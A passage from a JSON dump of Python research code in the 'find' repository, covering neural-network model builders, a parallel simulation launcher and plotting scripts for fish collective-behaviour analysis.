len(args.model_layers) == len(\n args.model_neurons), 'Number of layers and neuron mapping should have the same length'\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n\n for idx, l in enumerate(args.model_layers):\n if args.model_activations[idx] == 'None':\n activation = None\n elif args.model_activations[idx] in list(tfa.activations.keys()):\n activation = tfa.activations[args.model_activations[idx]]\n else:\n activation = args.model_activations[idx]\n\n if l == 'LSTM':\n if idx == 0:\n model.add(tf.keras.layers.LSTM(args.model_neurons[idx], return_sequences=False,\n input_shape=input_shape, activation=activation))\n else:\n model.add(tf.keras.layers.LSTM(args.model_neurons[idx], return_sequences=False,\n activation=activation))\n elif l == 'Dense':\n model.add(tf.keras.layers.Dense(\n args.model_neurons[idx], activation=activation))\n elif l == 'Reshape':\n model.add(tf.keras.layers.Reshape((1, args.model_neurons[idx])))\n elif l == 'Dropout':\n model.add(tf.keras.layers.Dropout(\n float(args.model_activations[idx])))\n elif l == 'Dense_out':\n if args.model_neurons[idx] > 0:\n neurons = args.model_neurons[idx]\n else:\n neurons = output_shape * 2\n model.add(tf.keras.layers.Dense(\n neurons, activation=activation))\n elif l == 'Norm': \n model.add(tf.keras.layers.BatchNormalization())\n\n model.compile(\n loss=gaussian_nll,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n\n\ndef PFW_model_builder(input_shape, output_shape, args):\n assert len(args.model_layers) == len(\n args.model_neurons), 'Number of layers and neuron mapping should have the same length'\n optimizer = tf.keras.optimizers.Adam(args.learning_rate)\n model = tf.keras.Sequential()\n 
model.add(tf.keras.layers.Flatten(input_shape=input_shape))\n\n for idx, l in enumerate(args.model_layers):\n if args.model_activations[idx] == 'None':\n activation = None\n elif args.model_activations[idx] in list(tfa.activations.keys()):\n activation = tfa.activations[args.model_activations[idx]]\n else:\n activation = args.model_activations[idx]\n\n if l == 'Dense':\n model.add(tf.keras.layers.Dense(\n args.model_neurons[idx], activation=activation))\n elif l == 'Dropout':\n model.add(tf.keras.layers.Dropout(\n float(activation)))\n elif l == 'Dense_out':\n if args.model_neurons[idx] > 0:\n neurons = args.model_neurons[idx]\n else:\n neurons = output_shape * 2\n model.add(tf.keras.layers.Dense(\n neurons, activation=activation))\n\n model.compile(\n loss=gaussian_nll,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n )\n return model\n"
},
{
"alpha_fraction": 0.5225752592086792,
"alphanum_fraction": 0.5261984467506409,
"avg_line_length": 45.296775817871094,
"blob_id": "7c4b151dd2b9daca34ef6da7762925281661aa28",
"content_id": "6c4627ff9bf375caa2798e17919d24c59f617ca9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7176,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 155,
"path": "/find/simulation/simulation.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport sys\nimport argparse\nfrom tqdm import tqdm\nfrom multiprocessing import Pool\n\nfrom find.models.loader import Loader\nfrom find.models.storage import ModelStorage\nfrom find.models.model_factory import ModelFactory\nfrom find.simulation.simulation_factory import available_functors, SimulationFactory, get_most_influential_individual\n\n\ndef run_process(process):\n # os.system('python {}'.format(process))\n os.system('python {} >/dev/null 2>&1'.format(process))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Interaction simulator')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--reference', '-r', type=str,\n help='Path to a reference experiment position file',\n required=True)\n parser.add_argument('--load', '-l',\n type=str,\n help='Load model from existing file and continue the training process',\n required=False)\n parser.add_argument('--num_proc', '-j', type=int,\n help='Number of pool processes to use',\n default=16,\n required=False)\n parser.add_argument('--backend',\n help='Backend selection',\n default='keras',\n choices=['keras', 'trajnet'])\n\n # model selection arguments\n nn_functor_selection = parser.add_argument_group('NN functor selection')\n nn_functor_selection.add_argument('--nn_functor',\n default=available_functors()[0],\n choices=available_functors())\n\n # simulation arguments\n simulation_group = parser.add_argument_group('Simulation configuration')\n simulation_group.add_argument('--iterations', '-i', type=int,\n help='Number of iteration of the simulation',\n default=-1,\n required=False)\n simulation_group.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n simulation_group.add_argument('--num_timesteps', type=int,\n help='Number of LSTM timesteps',\n default=0)\n simulation_group.add_argument('--prediction_steps', type=int,\n help='Number of prediction steps for the NN',\n default=1)\n simulation_group.add_argument('--distance_inputs', action='store_true',\n help='Use distance data as additional NN inputs',\n default=False)\n simulation_group.add_argument('--exclude_index', '-e', type=int,\n help='Index of the individual that will be replaced by a virtual agent (-1 will replace all original trajectories)',\n required=False,\n default=-1)\n simulation_group.add_argument('--polar', action='store_true',\n help='Use polar inputs instead of cartesian coordinates',\n default=False)\n simulation_group.add_argument('--timesteps_skip', type=int,\n help='Timesteps skipped between input and prediction',\n default=0,\n required=False)\n simulation_group.add_argument('--num_extra_virtu', type=int,\n help='Number of virtual individuals in the simulation',\n default=0)\n simulation_group.add_argument('--num_neighs_consider', type=int,\n help='Number of neighbours to consider in the simulation',\n default=1)\n simulation_group.add_argument('--most_influential_individual',\n help='Criterion for most influential individual',\n default=get_most_influential_individual()[0],\n choices=get_most_influential_individual())\n simulation_group.add_argument('--var_coef', type=float,\n help='Prediction variance coefficient',\n default=1.0,\n required=False)\n simulation_group.add_argument('--body_len', type=float,\n help='Fish body length (normalized)',\n default=0.19,\n required=False)\n simulation_group.add_argument('--simu_out_dir', type=str,\n help='Directory for simulation output 
files (always relative to the experiment path)',\n                                  default='generated',\n                                  required=False)\n    simulation_group.add_argument('--simu_stat_dump_period', type=int,\n                                  help='Write stat every set amount of iterations',\n                                  default=-1,\n                                  required=False)\n\n    args = parser.parse_args()\n    args.simu_out_dir = args.path + '/' + args.simu_out_dir\n\n    loader = Loader(path=args.path)\n    model_storage = ModelStorage(args.path)\n    model_factory = ModelFactory()\n    simu_factory = SimulationFactory()\n\n    model = model_storage.load_model(\n        args.load, args.backend, args)\n    if args.backend == 'keras':\n        model.summary()\n    elif args.backend == 'trajnet':\n        args.nn_functor = 'trajnet_dir'\n\n    print('Using {} backend'.format(args.backend))\n\n    # read reference data\n    data, files = loader.load(args.reference, is_absolute=True)\n    if args.num_proc < 0:\n        args.num_proc = len(data)\n\n    if len(data) == 1:\n        # generate simulator\n        simu = simu_factory(\n            data[0], model, args.nn_functor, args.backend, args)\n        if simu is None:\n            import warnings\n            warnings.warn('Skipping small simulation')\n            exit(1)\n        simu.spin()\n    else:\n        # in case we have multiple reference files we create a number\n        # of parallel processes that will each simulate a different reference\n        # file.\n        if '--reference' in sys.argv:\n            idx_ref_file = sys.argv.index('--reference') + 1\n        else:\n            idx_ref_file = sys.argv.index('-r') + 1\n        cmd = sys.argv\n\n        simu_list = []\n        for i, d in enumerate(data):\n            f = files[i]\n            cmd[idx_ref_file] = f\n            simu_list.append(' '.join(cmd))\n\n        with Pool(processes=args.num_proc) as p:\n            total_simus = len(simu_list)\n            with tqdm(total=total_simus, desc='Running multiple simulations') as pbar:\n                for i, _ in enumerate(p.imap_unordered(run_process, simu_list)):\n                    pbar.update()\n"
},
{
"alpha_fraction": 0.5073617100715637,
"alphanum_fraction": 0.5235973000526428,
"avg_line_length": 37.42507553100586,
"blob_id": "26e1c0f7079a711c20e28533d9404585263f98a8",
"content_id": "07bd200b3d657ff2347cdf33b4f28c5a394497c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12565,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 327,
"path": "/find/plots/spatial/relative_orientation.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.utils.utils import angle_to_pipi, compute_leadership\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\n\nfrom copy import deepcopy\n\n\ndef relative_orientation_to_neigh(data, ax, args):\n lines = ['-']\n linecycler = cycle(uni_lines)\n new_palette = uni_palette()\n # for p in uni_palette():\n # new_palette.extend([p, p, p])\n ccycler = cycle(sns.color_palette(new_palette))\n\n labels = []\n leadership = {}\n\n leadership = {}\n for k in sorted(data.keys()):\n pos = data[k]['pos']\n vel = data[k]['vel']\n leadership[k] = []\n for idx in range(len(pos)):\n (_, leadership_timeseries) = compute_leadership(pos[idx], vel[idx])\n leadership[k].append(leadership_timeseries)\n\n for k in sorted(data.keys()):\n leaders = leadership[k]\n labels.append(k)\n\n leader_dist = []\n follower_dist = []\n\n for e in range(len(data[k]['pos'])):\n p = data[k]['pos'][e]\n v = data[k]['vel'][e]\n\n hdgs = np.empty((p.shape[0], 0))\n for i in range(p.shape[1] // 2):\n hdg = np.arctan2(v[:, i*2+1], v[:, i*2])\n hdgs = np.hstack((hdgs, hdg.reshape(-1, 1)))\n\n # for the focal\n angle_dif_focal = hdgs[:, 0] - hdgs[:, 1]\n angle_dif_focal = list(map(angle_to_pipi, angle_dif_focal))\n angle_dif_focal = np.array(list(\n map(lambda x: x * 180 / np.pi, angle_dif_focal)))\n\n # for the neigh\n angle_dif_neigh = hdgs[:, 1] - hdgs[:, 0]\n angle_dif_neigh = list(map(angle_to_pipi, angle_dif_neigh))\n angle_dif_neigh = np.array(list(\n map(lambda x: x * 180 / np.pi, angle_dif_neigh)))\n angle_difs = [angle_dif_focal, angle_dif_neigh]\n\n leadership_mat = np.array(leaders[e])\n for j in range(p.shape[1] // 2):\n idx_leaders = np.where(leadership_mat[:, 1] == j)\n\n leader_dist += angle_difs[j][idx_leaders].tolist()\n follower_idcs = list(range(p.shape[1] // 2))\n follower_idcs.remove(j)\n for fidx in follower_idcs:\n follower_dist += angle_difs[fidx][idx_leaders].tolist()\n\n print('Orientation to neigh', k)\n print('LF: ', np.mean(leader_dist+follower_dist),\n np.std(leader_dist+follower_dist))\n\n ax = sns.kdeplot(leader_dist + follower_dist, ax=ax, color=next(ccycler),\n linestyle=next(linecycler), label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-180, 180], bw_adjust=.35, cut=-1)\n # sns.kdeplot(leader_dist, ax=ax, color=next(ccycler),\n # linestyle=next(linecycler), label='Leader (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-180, 180], bw_adjust=.25, cut=-1)\n # sns.kdeplot(follower_dist, ax=ax, color=next(ccycler),\n # linestyle=next(linecycler), label='Follower (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-180, 180], bw_adjust=.25, cut=-1)\n return ax\n\n\ndef relative_orientation_to_wall(data, ax, args):\n lines = ['--', ':']\n linecycler = cycle(lines)\n new_palette = uni_palette()\n new_palette *= 3\n ccycler = cycle(sns.color_palette(new_palette))\n\n labels = []\n leadership = {}\n\n leadership = {}\n for k in sorted(data.keys()):\n pos = data[k]['pos']\n vel = data[k]['vel']\n leadership[k] = []\n for idx in range(len(pos)):\n (_, leadership_timeseries) = compute_leadership(pos[idx], vel[idx])\n leadership[k].append(leadership_timeseries)\n\n for k in sorted(data.keys()):\n leaders = leadership[k]\n labels.append(k)\n\n leader_dist = []\n follower_dist = []\n\n for e in range(len(data[k]['pos'])):\n p = data[k]['pos'][e]\n v = data[k]['vel'][e]\n\n hdgs = np.empty((p.shape[0], 0))\n for i in range(p.shape[1] // 2):\n hdg = np.arctan2(v[:, 
i*2+1], v[:, i*2])\n hdgs = np.hstack((hdgs, hdg.reshape(-1, 1)))\n\n # for the focal\n angle_dif_focal = hdgs[:, 0] - np.arctan2(p[:, 1], p[:, 0])\n angle_dif_focal = list(map(angle_to_pipi, angle_dif_focal))\n angle_dif_focal = np.array(list(\n map(lambda x: x * 180 / np.pi, angle_dif_focal)))\n\n # for the neigh\n angle_dif_neigh = hdgs[:, 1] - np.arctan2(p[:, 3], p[:, 2])\n angle_dif_neigh = list(map(angle_to_pipi, angle_dif_neigh))\n angle_dif_neigh = np.array(list(\n map(lambda x: x * 180 / np.pi, angle_dif_neigh)))\n angle_difs = [angle_dif_focal, angle_dif_neigh]\n\n leadership_mat = np.array(leaders[e])\n for j in range(p.shape[1] // 2):\n idx_leaders = np.where(leadership_mat[:, 1] == j)\n\n leader_dist += angle_difs[j][idx_leaders].tolist()\n follower_idcs = list(range(p.shape[1] // 2))\n follower_idcs.remove(j)\n for fidx in follower_idcs:\n follower_dist += angle_difs[fidx][idx_leaders].tolist()\n\n print('Orientation to wall', k)\n print('LF: ', np.mean(leader_dist+follower_dist),\n np.std(leader_dist+follower_dist))\n print('L: ', np.mean(leader_dist),\n np.std(leader_dist))\n print('F: ', np.mean(follower_dist),\n np.std(follower_dist))\n\n ccolour = next(ccycler)\n # ax = sns.kdeplot(leader_dist + follower_dist, ax=ax, color=next(ccycler),\n # linestyle=next(linecycler), label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-180, 180], bw_adjust=.15, cut=-1)\n ax = sns.kdeplot(leader_dist, ax=ax, color=ccolour,\n linestyle='--', label='Leader (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-180, 180], bw_adjust=.15, cut=-1)\n ax = sns.kdeplot(follower_dist, ax=ax, color=ccolour,\n linestyle=':', label='Follower (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-180, 180], bw_adjust=.15, cut=-1)\n return ax\n\n\ndef viewing_angle(data, ax, args):\n lines = ['--', ':']\n linecycler = cycle(lines)\n new_palette = uni_palette()\n ccycler = cycle(sns.color_palette(new_palette))\n\n labels = []\n leadership = {}\n\n leadership = {}\n for k in sorted(data.keys()):\n pos = data[k]['pos']\n vel = data[k]['vel']\n leadership[k] = []\n for idx in range(len(pos)):\n (_, leadership_timeseries) = compute_leadership(pos[idx], vel[idx])\n leadership[k].append(leadership_timeseries)\n\n for k in sorted(data.keys()):\n leaders = leadership[k]\n labels.append(k)\n\n leader_dist = []\n follower_dist = []\n\n for e in range(len(data[k]['pos'])):\n p = data[k]['pos'][e]\n v = data[k]['vel'][e]\n\n hdgs = np.empty((p.shape[0], 0))\n for i in range(p.shape[1] // 2):\n hdg = np.arctan2(v[:, i*2+1], v[:, i*2])\n hdgs = np.hstack((hdgs, hdg.reshape(-1, 1)))\n\n # for the focal\n angle_dif_focal = hdgs[:, 0] - \\\n np.arctan2(p[:, 3] - p[:, 1], p[:, 2] - p[:, 0])\n angle_dif_focal = list(map(angle_to_pipi, angle_dif_focal))\n angle_dif_focal = np.array(list(\n map(lambda x: x * 180 / np.pi, angle_dif_focal)))\n\n # for the neigh\n angle_dif_neigh = hdgs[:, 1] - \\\n np.arctan2(p[:, 1] - p[:, 3], p[:, 0] - p[:, 2])\n angle_dif_neigh = list(map(angle_to_pipi, angle_dif_neigh))\n angle_dif_neigh = np.array(list(\n map(lambda x: x * 180 / np.pi, angle_dif_neigh)))\n angle_difs = [angle_dif_focal, angle_dif_neigh]\n\n leadership_mat = np.array(leaders[e])\n for j in range(p.shape[1] // 2):\n idx_leaders = np.where(leadership_mat[:, 1] == j)\n\n leader_dist += angle_difs[j][idx_leaders].tolist()\n follower_idcs = list(range(p.shape[1] // 2))\n follower_idcs.remove(j)\n for fidx in follower_idcs:\n follower_dist += 
angle_difs[fidx][idx_leaders].tolist()\n\n print('Viewing angle', k)\n print('LF: ', np.mean(leader_dist+follower_dist),\n np.std(leader_dist+follower_dist))\n print('L: ', np.mean(leader_dist),\n np.std(leader_dist))\n print('F: ', np.mean(follower_dist),\n np.std(follower_dist))\n\n ccolour = next(ccycler)\n # ax = sns.kdeplot(leader_dist + follower_dist, ax=ax, color=ccolour,\n # linestyle=next(linecycler), label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-200, 200], bw_adjust=.25, cut=-1)\n ax = sns.kdeplot(leader_dist, ax=ax, color=ccolour,\n linestyle='--', label='Leader (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-200, 200], bw_adjust=.25, cut=-1)\n ax = sns.kdeplot(follower_dist, ax=ax, color=ccolour,\n linestyle=':', label='Follower (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=[-200, 200], bw_adjust=.25, cut=-1)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {'pos': [], 'vel': []}\n for p in pos:\n p = np.loadtxt(p) * args.radius\n v = Velocities([p], args.timestep).get()[0]\n data[e]['pos'].append(p)\n data[e]['vel'].append(v)\n\n # relative angle to neigh\n _ = plt.figure(figsize=(6, 5))\n ax = plt.gca()\n\n ax = relative_orientation_to_neigh(data, ax, args)\n\n ax.set_xlabel(r'$\\Delta \\phi$ (degrees)')\n ax.set_ylabel('PDF')\n ax.set_xticks(np.arange(-180, 181, 60))\n ax.legend()\n plt.savefig(path + 'relative_orientation.png')\n\n # relative angle to wall\n _ = plt.figure(figsize=(6, 5))\n ax = plt.gca()\n\n ax = relative_orientation_to_wall(data, ax, args)\n\n ax.set_xlabel(r'$\\theta_w$ (degrees)')\n ax.set_ylabel('PDF')\n ax.set_xticks(np.arange(-180, 181, 60))\n ax.legend()\n plt.savefig(path + 'relative_orientation_wall.png')\n\n # viewing angle\n _ = plt.figure(figsize=(6, 5))\n ax = plt.gca()\n\n ax = viewing_angle(data, ax, args)\n\n ax.set_xlabel(r'$\\psi$ (degrees)')\n ax.set_ylabel('PDF')\n ax.set_xticks(np.arange(-200, 201, 50))\n ax.legend()\n plt.savefig(path + 'viewing_angle.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Relative orientation figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.44731712341308594,
"alphanum_fraction": 0.48753461241722107,
"avg_line_length": 35.36940383911133,
"blob_id": "05258a8894fbb721fae57585ea4b3ddf3587f32a",
"content_id": "d56abc87026b54c0c15f3e7b7e6b1e160453ad6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9747,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 268,
"path": "/find/plots/dl_si_2021/correlation_quantities.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\nfrom turtle import position\n\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\nimport find.plots.common as shared\nfrom find.utils.utils import angle_to_pipi\n\nfrom find.plots.correlation.position_correlation import corx\nfrom find.plots.correlation.velocity_correlation import corv\nfrom find.plots.correlation.relative_orientation_correlation import cortheta\n\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\n AutoMinorLocator, FuncFormatter)\n\n\nROBOT_DATA = True\nTRAJNET_DATA = False\nPFW_DATA = False\nDISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = False\n# PFW_DATA = False\n# DISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = False\n# PFW_DATA = True\n# DISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = True\n# PFW_DATA = False\n# DISABLE_TOULOUSE = True\n\n\ndef reset_palette():\n if TRAJNET_DATA:\n shared._uni_pallete = [\"#000000\", \"#ed8b02\", \"#e74c3c\"]\n elif PFW_DATA:\n shared._uni_pallete = [\"#000000\", \"#D980FA\"]\n elif ROBOT_DATA:\n shared._uni_pallete = [\"#000000\", \"#e74c3c\", \"#2596be\"]\n else:\n shared._uni_pallete = [\"#000000\", \"#e74c3c\", \"#3498db\", \"#2ecc71\"]\n\n\ndef annot_axes(ax, xlabel, ylabel, xlim, ylim, xloc, yloc, yscale):\n ax.set_xlabel(xlabel)\n ax.set_xlim(xlim)\n ax.xaxis.set_major_locator(MultipleLocator(xloc[0]))\n ax.xaxis.set_minor_locator(MultipleLocator(xloc[1]))\n ax.tick_params(axis=\"x\", which='both',\n direction=\"in\")\n ax.tick_params(axis=\"x\", which='major', length=4.0, width=0.7)\n ax.tick_params(axis=\"x\", which='minor', length=2.0, width=0.7)\n\n ax.set_ylabel(ylabel)\n ylim = [e / yscale for e in ylim]\n ax.set_ylim(ylim)\n ax.get_yaxis().set_major_formatter(\n FuncFormatter(lambda x, p: '{:.1f}'.format(x * yscale, ',')))\n ax.yaxis.set_major_locator(MultipleLocator(yloc[0] / yscale))\n ax.yaxis.set_minor_locator(MultipleLocator(yloc[1] / yscale))\n ax.tick_params(which='both', bottom=True,\n left=True, right=True, top=True)\n ax.tick_params(axis=\"y\", which='both', direction=\"in\")\n ax.grid(False)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e]['pos'] = []\n data[e]['vel'] = []\n data[e]['rvel'] = []\n data[e]['interindividual_distance'] = []\n data[e]['rel_or'] = []\n for p in pos:\n if e == 'Virtual (Toulouse)' and not DISABLE_TOULOUSE:\n f = open(p)\n # to allow for loading fortran's doubles\n strarray = f.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n f.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n positions = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n elif e == 'Virtual (Toulouse cpp)':\n positions = np.loadtxt(p)[:, 2:] * args.radius\n else:\n positions = np.loadtxt(p) * args.radius\n if args.num_virtual_samples > 0:\n positions = positions[:args.num_virtual_samples]\n\n if e == 'Robot':\n velocities = Velocities([positions], 0.1).get()[0]\n else:\n velocities = Velocities([positions], args.timestep).get()[0]\n linear_velocity = np.array((velocities.shape[0], 1))\n tup = []\n for i in range(velocities.shape[1] // 2):\n linear_velocity = np.sqrt(\n velocities[:, i * 2] ** 2 + velocities[:, i * 2 + 1] ** 2).tolist()\n tup.append(linear_velocity)\n\n hdgs = np.empty((positions.shape[0], 0))\n for i in range(positions.shape[1] // 2):\n hdg = np.arctan2(velocities[:, i*2+1], velocities[:, i*2])\n 
hdgs = np.hstack((hdgs, hdg.reshape(-1, 1)))\n\n # for the focal\n angle_dif_focal = hdgs[:, 0] - \\\n np.arctan2(positions[:, 1], positions[:, 0])\n angle_dif_focal = list(map(angle_to_pipi, angle_dif_focal))\n\n # for the neigh\n angle_dif_neigh = hdgs[:, 1] - \\\n np.arctan2(positions[:, 3], positions[:, 2])\n angle_dif_neigh = list(map(angle_to_pipi, angle_dif_neigh))\n\n data[e]['rel_or'].append(\n np.array([angle_dif_focal, angle_dif_neigh]).T)\n\n distance = np.sqrt(\n (positions[:, 0] - positions[:, 2]) ** 2 + (positions[:, 1] - positions[:, 3]) ** 2)\n\n data[e]['rvel'].append(np.array(tup).T)\n data[e]['pos'].append(positions)\n data[e]['vel'].append(velocities)\n data[e]['interindividual_distance'].append(distance)\n\n ###############################################################################\n # Virtual\n ###############################################################################\n _, ax = plt.subplots(figsize=(10, 3),\n nrows=1, ncols=3,\n gridspec_kw={'width_ratios': [\n 1, 1, 1], 'wspace': 0.3, 'hspace': 0.0}\n )\n\n # position\n\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n reset_palette()\n ax[0] = corx(sub_data, ax[0], args)\n ax[0] = annot_axes(ax[0],\n '$t$ (s)', r'$C_X$ $(cm^2)$',\n [0.0, 25.0], [0.0, 1300],\n [5, 2.5], [250, 125],\n 1)\n print('Done with position')\n\n # velocity\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n reset_palette()\n ax[1] = corv(sub_data, ax[1], args)\n ax[1] = annot_axes(ax[1],\n '$t$ (s)', r'$C_V$ $(\\,cm^2 / \\,s^2)$',\n [0.0, 25.0], [-100.0, 200],\n [5, 2.5], [50, 25],\n 1)\n ax[1].yaxis.set_label_coords(-0.18, 0.5)\n print('Done with Velocity')\n\n # relative orientation\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n reset_palette()\n ax[2] = cortheta(sub_data, ax[2], args)\n ax[2] = annot_axes(ax[2],\n '$t$ (s)', r'$C_{\\theta_{\\rm w}}$',\n [0.0, 25.0], [0.0, 1.0],\n [5, 2.5], [0.2, 0.1],\n 1)\n print('Done with theta')\n\n # ax[0].text(-0.2, 1.07, r'$\\mathbf{A}$',\n # fontsize=18, transform=ax[0].transAxes)\n # ax[1].text(-0.2, 1.07, r'$\\mathbf{B}$',\n # fontsize=18, transform=ax[1].transAxes)\n # ax[2].text(-0.2, 1.07, r'$\\mathbf{C}$',\n # fontsize=18, transform=ax[2].transAxes)\n\n ax[0].legend().remove()\n ax[1].legend().remove()\n ax[2].legend().remove()\n\n plt.gcf().subplots_adjust(bottom=0.141, left=0.078, top=0.965, right=0.985)\n plt.savefig(path + 'correlation_quantities_virtual.png')\n\n ###############################################################################\n # Hybrid\n ###############################################################################\n _, ax = plt.subplots(figsize=(10, 3),\n nrows=1, ncols=3,\n gridspec_kw={'width_ratios': [\n 1, 1, 1], 'wspace': 0.3, 'hspace': 0.0}\n )\n\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n reset_palette()\n ax[0] = corx(sub_data, ax[0], args)\n ax[0] = annot_axes(ax[0],\n '$t$ (s)', r'$C_X$ $(cm^2)$',\n [0.0, 25.0], [0.0, 1300],\n [5, 2.5], [250, 125],\n 1)\n print('Done with position')\n\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n reset_palette()\n ax[1] = corv(sub_data, ax[1], args)\n ax[1] = annot_axes(ax[1],\n '$t$ (s)', r'$C_V$ $(\\,cm^2 / \\,s^2)$',\n [0.0, 25.0], [-100.0, 200],\n [5, 2.5], 
[50, 25],\n 1)\n ax[1].yaxis.set_label_coords(-0.18, 0.5)\n print('Done with Velocity')\n\n shared._uni_pallete = [\"#e74c3c\", \"#000000\", \"#3498db\"]\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n reset_palette()\n ax[2] = cortheta(sub_data, ax[2], args)\n ax[2] = annot_axes(ax[2],\n '$t$ (s)', r'$C_{\\theta_{\\rm w}}$',\n [0.0, 25.0], [0.0, 1.0],\n [5, 2.5], [0.2, 0.1],\n 1)\n print('Done with theta')\n\n # ax[0].text(-0.2, 1.07, r'$\\mathbf{A}$',\n # fontsize=18, transform=ax[0].transAxes)\n # ax[1].text(-0.2, 1.07, r'$\\mathbf{B}$',\n # fontsize=18, transform=ax[1].transAxes)\n # ax[2].text(-0.2, 1.07, r'$\\mathbf{C}$',\n # fontsize=18, transform=ax[2].transAxes)\n\n ax[0].legend().remove()\n ax[1].legend().remove()\n ax[2].legend().remove()\n\n plt.gcf().subplots_adjust(bottom=0.135, left=0.078, top=0.965, right=0.985)\n plt.savefig(path + 'correlation_quantities_hybrid.png')\n\n print('Done with relative orientation to the wall')\n"
},
{
"alpha_fraction": 0.5792682766914368,
"alphanum_fraction": 0.5862369537353516,
"avg_line_length": 30.88888931274414,
"blob_id": "cbef7b5f440052a982e797f1442f23e6f7a96578",
"content_id": "4d0c7d370912e0c198da3086cc2a75b7116f3c7b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1148,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 36,
"path": "/find/simulation/position_stat.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.simulation.simu.stat.stat_base import StatBase\n\nimport numpy as np\nfrom pathlib import Path\n\n\nclass PositionStat(StatBase):\n def __init__(self, dims, filename, dirname='', dump_period=-1):\n super().__init__(filename, dirname, dump_period)\n self._positions = np.empty((0, dims))\n self._dims = dims\n\n def get_filename(self):\n return self._filename\n\n def get(self):\n return self._positions\n\n def save(self):\n np.savetxt(Path(self._dirname).joinpath(\n self._filename), self._positions)\n\n def __call__(self, simu):\n early_dump = self._dump_period > 0 and simu.get_current_iteration() % self._dump_period == 0\n\n if simu.get_num_iterations() == simu.get_current_iteration() + 1 or early_dump:\n appended_pos = np.empty(\n (simu.get_individuals()[0].get_position_history().shape[0], 0))\n\n for ind in simu.get_individuals():\n appended_pos = np.hstack(\n (appended_pos, ind.get_position_history()))\n self._positions = appended_pos\n\n if early_dump:\n self.save()\n"
},
{
"alpha_fraction": 0.5680586695671082,
"alphanum_fraction": 0.5769844055175781,
"avg_line_length": 31.010204315185547,
